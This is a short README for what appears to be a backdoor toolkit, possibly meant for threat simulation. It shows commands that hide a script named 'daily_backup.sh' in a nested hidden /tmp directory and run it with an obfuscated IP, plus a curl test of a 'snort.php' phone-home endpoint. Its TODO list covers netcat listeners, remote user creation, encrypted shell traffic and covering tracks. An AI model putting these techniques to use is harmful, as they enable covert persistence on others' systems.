- Kali 1.1.0, CentOS 6.5, Ubuntu 14.04.2

$ mkdir -p /tmp/.root/.home/.user/

$ mv daily_backup.sh /tmp/.root/.home/.user/

$ chmod u+x daily_backup.sh

$ ./daily_backup.sh -i "Obfuscated IP"

You can test snort.php with the following:

$ curl -d "eFh4R2VuPE93bmVkIEJ5IEcwZHoxbGw0PkdlbnhYeA==" -A "H4x0r Lit3 - Ph0n3H0m3 v1.0" http://localhost/snort.php

- Backup shell errors, needs to be worked on
- Generated Scripts may need some work, polishing, fixing
- Copying .history/.bash_history every run is a little excessive
- Fix script to check for addUser command from snort.php and fix script to execute the command
- Took out bash listeners since I cannot background the bash listeners
- Took out netcat listeners due to issues (Will fix and add in later)
- [De]obfuscation of IP Address is broken, temporarily taken out until fixed -- Normal Deobf/Obf functions work
- Create variations of the script to match the level of threat actor
  - e.g. level 0/1 - Script Kiddie, no tracks covering
  - level X - Quiet, no history deletion, logs modified, etc. - Use ICMPShell?
- Encrypt nc/shell traffic?
- Fix formatting
- Add comments/Remove comments
- Speed up processing time.
- Special thanks to Justin Wray (Synister Syntax)